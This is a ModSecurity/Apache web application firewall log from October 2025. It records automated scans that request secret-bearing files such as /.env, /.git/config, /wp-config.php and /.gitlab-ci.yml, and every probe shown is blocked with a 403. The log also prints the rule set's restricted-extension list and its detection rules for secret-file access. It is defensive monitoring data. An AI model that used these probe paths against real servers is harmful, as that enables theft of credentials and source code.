[Fri Oct 03 16:47:15.399270 2025] [:error] [pid 3205788] [client 93.123.109.60:35684] [client 93.123.109.60] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aN_h81hJCSZIMkwC-iURaAAAABI"]
[Fri Oct 03 16:47:15.399441 2025] [:error] [pid 3205788] [client 93.123.109.60:35684] [client 93.123.109.60] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aN_h81hJCSZIMkwC-iURaAAAABI"]
[Fri Oct 03 16:47:15.511648 2025] [:error] [pid 3205782] [client 93.123.109.60:35688] [client 93.123.109.60] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aN_h8zwketANlikPcL2rKAAAAA0"]
[Fri Oct 03 16:47:15.512615 2025] [:error] [pid 3205782] [client 93.123.109.60:35688] [client 93.123.109.60] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aN_h8zwketANlikPcL2rKAAAAA0"]
[Fri Oct 03 16:47:15.512808 2025] [:error] [pid 3205782] [client 93.123.109.60:35688] [client 93.123.109.60] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aN_h8zwketANlikPcL2rKAAAAA0"]
[Fri Oct 03 16:47:15.668915 2025] [:error] [pid 3205788] [client 93.123.109.60:35684] [client 93.123.109.60] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "aN_h81hJCSZIMkwC-iURaQAAABI"]
[Fri Oct 03 16:47:15.669820 2025] [:error] [pid 3205788] [client 93.123.109.60:35684] [client 93.123.109.60] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "aN_h81hJCSZIMkwC-iURaQAAABI"]
[Fri Oct 03 16:47:15.670003 2025] [:error] [pid 3205788] [client 93.123.109.60:35684] [client 93.123.109.60] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "aN_h81hJCSZIMkwC-iURaQAAABI"]
[Fri Oct 03 16:47:15.873266 2025] [:error] [pid 3205782] [client 93.123.109.60:35688] [client 93.123.109.60] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.bak"] [unique_id "aN_h8zwketANlikPcL2rKQAAAA0"]
[Fri Oct 03 16:47:15.873474 2025] [:error] [pid 3205782] [client 93.123.109.60:35688] [client 93.123.109.60] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.bak"] [unique_id "aN_h8zwketANlikPcL2rKQAAAA0"]
[Fri Oct 03 16:47:15.874405 2025] [:error] [pid 3205782] [client 93.123.109.60:35688] [client 93.123.109.60] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.bak"] [unique_id "aN_h8zwketANlikPcL2rKQAAAA0"]
[Fri Oct 03 16:47:15.874597 2025] [:error] [pid 3205782] [client 93.123.109.60:35688] [client 93.123.109.60] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.bak"] [unique_id "aN_h8zwketANlikPcL2rKQAAAA0"]
[Fri Oct 03 16:47:16.066024 2025] [:error] [pid 3205788] [client 93.123.109.60:35684] [client 93.123.109.60] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/logs/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/logs/HEAD"] [unique_id "aN_h9FhJCSZIMkwC-iURagAAABI"]
[Fri Oct 03 16:47:16.067118 2025] [:error] [pid 3205788] [client 93.123.109.60:35684] [client 93.123.109.60] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/logs/HEAD"] [unique_id "aN_h9FhJCSZIMkwC-iURagAAABI"]
[Fri Oct 03 16:47:16.067306 2025] [:error] [pid 3205788] [client 93.123.109.60:35684] [client 93.123.109.60] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/logs/HEAD"] [unique_id "aN_h9FhJCSZIMkwC-iURagAAABI"]
[Fri Oct 03 16:47:16.358469 2025] [:error] [pid 3205782] [client 93.123.109.60:35688] [client 93.123.109.60] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "aN_h9DwketANlikPcL2rKgAAAA0"]
[Fri Oct 03 16:47:16.359389 2025] [:error] [pid 3205782] [client 93.123.109.60:35688] [client 93.123.109.60] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "aN_h9DwketANlikPcL2rKgAAAA0"]
[Fri Oct 03 16:47:16.359598 2025] [:error] [pid 3205782] [client 93.123.109.60:35688] [client 93.123.109.60] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "aN_h9DwketANlikPcL2rKgAAAA0"]
[Fri Oct 03 16:47:16.639755 2025] [:error] [pid 3205788] [client 93.123.109.60:35684] [client 93.123.109.60] ModSecurity: Warning. Matched phrase ".gitlab-ci.yml" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .gitlab-ci.yml found within REQUEST_FILENAME: /.gitlab-ci.yml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.gitlab-ci.yml"] [unique_id "aN_h9FhJCSZIMkwC-iURawAAABI"]
[Fri Oct 03 16:47:16.640824 2025] [:error] [pid 3205788] [client 93.123.109.60:35684] [client 93.123.109.60] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.gitlab-ci.yml"] [unique_id "aN_h9FhJCSZIMkwC-iURawAAABI"]
[Fri Oct 03 16:47:16.641030 2025] [:error] [pid 3205788] [client 93.123.109.60:35684] [client 93.123.109.60] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.gitlab-ci.yml"] [unique_id "aN_h9FhJCSZIMkwC-iURawAAABI"]
[Fri Oct 03 17:00:59.493146 2025] [:error] [pid 3206794] [client 213.209.157.93:56370] [client 213.209.157.93] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aN_lK9w4HT_QTrsChmIRfgAAAAA"]
[Fri Oct 03 17:00:59.493452 2025] [:error] [pid 3206794] [client 213.209.157.93:56370] [client 213.209.157.93] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aN_lK9w4HT_QTrsChmIRfgAAAAA"]
[Fri Oct 03 17:00:59.493643 2025] [:error] [pid 3206794] [client 213.209.157.93:56370] [client 213.209.157.93] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aN_lK9w4HT_QTrsChmIRfgAAAAA"]
[Fri Oct 03 17:47:33.889058 2025] [:error] [pid 3191520] [client 185.177.72.45:34310] [client 185.177.72.45] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aN_wFd6LyA7gcmhhU38UXwAAAAE"]
[Fri Oct 03 17:47:33.889294 2025] [:error] [pid 3191520] [client 185.177.72.45:34310] [client 185.177.72.45] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aN_wFd6LyA7gcmhhU38UXwAAAAE"]
[Fri Oct 03 17:47:33.889469 2025] [:error] [pid 3191520] [client 185.177.72.45:34310] [client 185.177.72.45] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aN_wFd6LyA7gcmhhU38UXwAAAAE"]
[Fri Oct 03 17:47:34.120644 2025] [:error] [pid 3205792] [client 185.177.72.45:34326] [client 185.177.72.45] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aN_wFomFdmNKRZSApKK8SgAAABY"]
[Fri Oct 03 17:47:34.120916 2025] [:error] [pid 3205792] [client 185.177.72.45:34326] [client 185.177.72.45] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aN_wFomFdmNKRZSApKK8SgAAABY"]
[Fri Oct 03 17:47:34.121213 2025] [:error] [pid 3205792] [client 185.177.72.45:34326] [client 185.177.72.45] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aN_wFomFdmNKRZSApKK8SgAAABY"]
[Fri Oct 03 17:47:34.145797 2025] [:error] [pid 3205792] [client 185.177.72.45:34326] [client 185.177.72.45] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aN_wFomFdmNKRZSApKK8SwAAABY"]
[Fri Oct 03 17:47:34.145997 2025] [:error] [pid 3205792] [client 185.177.72.45:34326] [client 185.177.72.45] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aN_wFomFdmNKRZSApKK8SwAAABY"]
[Fri Oct 03 17:47:34.146157 2025] [:error] [pid 3205792] [client 185.177.72.45:34326] [client 185.177.72.45] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aN_wFomFdmNKRZSApKK8SwAAABY"]
[Fri Oct 03 17:47:34.170810 2025] [:error] [pid 3205792] [client 185.177.72.45:34326] [client 185.177.72.45] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aN_wFomFdmNKRZSApKK8TAAAABY"]
[Fri Oct 03 17:47:34.171031 2025] [:error] [pid 3205792] [client 185.177.72.45:34326] [client 185.177.72.45] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aN_wFomFdmNKRZSApKK8TAAAABY"]
[Fri Oct 03 17:47:34.171210 2025] [:error] [pid 3205792] [client 185.177.72.45:34326] [client 185.177.72.45] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aN_wFomFdmNKRZSApKK8TAAAABY"]
[Fri Oct 03 20:57:25.651611 2025] [:error] [pid 3191523] [client 3.140.182.19:46953] [client 3.140.182.19] ModSecurity: Warning. Matched phrase "zgrab" at REQUEST_HEADERS:User-Agent. [file "/usr/share/modsecurity-crs/rules/REQUEST-913-SCANNER-DETECTION.conf"] [line "55"] [id "913100"] [msg "Found User-Agent associated with security scanner"] [data "Matched Data: zgrab found within REQUEST_HEADERS:User-Agent: mozilla/5.0 zgrab/0.x"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-reputation-scanner"] [tag "OWASP_CRS"] [tag "OWASP_CRS/AUTOMATION/SECURITY_SCANNER"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/"] [unique_id "aOAclROh09Q7Bp7F97zmqAAAAAQ"]
[Fri Oct 03 20:57:25.652045 2025] [:error] [pid 3191523] [client 3.140.182.19:46953] [client 3.140.182.19] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/"] [unique_id "aOAclROh09Q7Bp7F97zmqAAAAAQ"]
[Fri Oct 03 20:57:25.652277 2025] [:error] [pid 3191523] [client 3.140.182.19:46953] [client 3.140.182.19] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/"] [unique_id "aOAclROh09Q7Bp7F97zmqAAAAAQ"]
